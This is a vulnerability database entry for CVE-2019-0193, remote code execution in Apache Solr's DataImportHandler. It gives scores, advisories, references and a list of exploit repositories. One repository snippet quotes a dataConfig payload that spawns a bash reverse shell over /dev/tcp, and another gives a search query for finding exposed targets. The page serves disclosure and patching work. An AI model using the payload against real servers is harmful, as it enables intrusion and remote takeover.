Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9
CVSSv2

CVE-2019-0193

Published: 01/08/2019 Updated: 07/11/2023
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2
VMScore: 804
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Subscribe to Apache

Vulnerability Summary

In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache solr

Vendor Advisories

Red Hat: CVE-2019-0193
Impact: Important Public Date: 2019-07-31 CWE: CWE-20 Bugzilla: 1736774: CVE-2019-0193 solr: Remote Cod ...

Mailing Lists

Full Disclosure: [CVE-2019-0193] Apache Solr, Remote Code Execution via DataImportHandler
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> [CVE-2019-0193] Apache Solr, Remote Code Execution via DataImportHandler <!--X-Subject-Header-End--> <!--X-Head-of-Message--> ...

Github Repositories

https://github.com/1135/solr_exploit

Apache Solr远程代码执行漏洞(CVE-2019-0193) Exploit

声明 此处提供的漏洞检测方法、文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者务必遵守法律规定,禁止在没有得到授权的情况下做任何漏洞检测。 简介 漏洞分析 - Apache Solr远程代码执行漏洞(CVE-2019-0193) - 先知社区 理

https://github.com/Loneyers/solr-rce

Apache Solr RCE via Velocity template

solr-cve-2019-0193 Apache Solr RCE via Velocity template 使用 python3 solr-rcepy -f urltxt python3 solr-rcepy -url wwwgooglecom 参考: gistgithubusercontentcom/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1txt

https://github.com/fengwenhua/CNVD-2021-26058

亿赛通电子文档安全管理系统-rce-exp

CNVD-2021-26058 亿赛通电子文档安全管理系统-rce-exp 漏洞成因 使用了Apache Solr,漏洞编号:CVE-2019-0193 Fofa "电子文档安全管理系统" &amp;&amp; country!="CN" 脚本使用 ~# python3 yisaitong-exppy -h usage: yisaitong-exppy [-h] [-u URL] [-c CMD] [-f FILE] [-k SKIP] 亿赛

https://github.com/scxiaotan1/Linux

漏洞环境复现

Apache-Flink未授权访 漏洞环境复现 Apache Solr CVE-2019-0193 环境搭建漏洞复现 漏洞环境复现 Tomcat CVE-2017-12617 环境搭建漏洞利用复现 漏洞环境复现 说明 此项目仅供学习参考使用,严禁用于任何非法行为!

https://github.com/scxiaotan1/Docker

漏洞环境复现

Apache-Flink未授权访 漏洞环境复现 Apache Solr CVE-2019-0193 环境搭建漏洞复现 漏洞环境复现 Tomcat CVE-2017-12617 环境搭建漏洞利用复现 漏洞环境复现 说明 此项目仅供学习参考使用,严禁用于任何非法行为!

https://github.com/xConsoIe/CVE-2019-0193

CVE-2019-0193 Remote Code Execution

https://github.com/1135/notes

Security & Development

公开笔记 SDL - 安全开发生命周期 实践与意义 SDL - API设计规范 CheckList NTA - 网络流量分析 抓包实践(wireshark/Tshark) NTA - 网络流量分析 IDS/IPS 原理 引擎 规则(suricata) web - vul - SQLi 原理 利用方式 修复方案 web - vul - SSRF 原理 利用方式 修复方案 web - vul - XSS 原理 利用方式 修复方案 web - vul - CSRF

https://github.com/jas502n/CVE-2019-0193

Apache Solr DataImport Handler RCE

CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln &lt; solr v812) python usage python CVE-2019

https://github.com/jaychouzzk/CVE-2019-0193-exp

CVE-2019-0193-exp 1 &lt;dataConfig&gt; &lt;dataSource type="URLDataSource"/&gt; &lt;script&gt;&lt;![CDATA[ function poc(row){ var bufReader = new javaioBufferedReader(new javaioInputStreamReader(javalangRuntimegetRuntime()exec("/bin/bash -c $@|bash 0 echo bash -i &gt;&amp;/dev/tcp/127001/9999 0&

https://github.com/Nishacid/Easy_RCE_Scanner

Helps you find sensitive open ports, which usually leads to an easy RCE.

Easy RCE Scanner Script for the automation of your Pentest or Bug Bounty recon It will help you find sensitive open ports, which usually leads to an easy RCE Sensible Ports IBM WebSphere : 8880 Apache Hadoop : 8088 Apache Spark : 6066 Apache Solr : 8983 Redis : 6379 Docker : 2375, 2376 Zoho Manageengine Desktop : 8383 Atlassian Crowd : 4990 Portainer : 9000 Hashicorp Consul

References

CWE-94https://issues.apache.org/jira/browse/SOLR-13669https://lists.debian.org/debian-lts-announce/2019/10/msg00013.htmlhttps://lists.debian.org/debian-lts-announce/2020/08/msg00025.htmlhttps://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3Ehttps://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66%40%3Cdev.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699%40%3Cissues.lucene.apache.org%3Ehttps://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8%40%3Ccommits.submarine.apache.org%3Ehttps://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3Ehttps://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc%40%3Cusers.solr.apache.org%3Ehttps://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314%40%3Cusers.solr.apache.org%3Ehttps://nvd.nist.govhttps://github.com/1135/solr_exploithttps://access.redhat.com/security/cve/cve-2019-0193
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-27977IMAPlocal usersCVE-2024-32038CVE-2023-49963CVE-2023-22869CVE-2024-31497localCVE-2024-2961
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook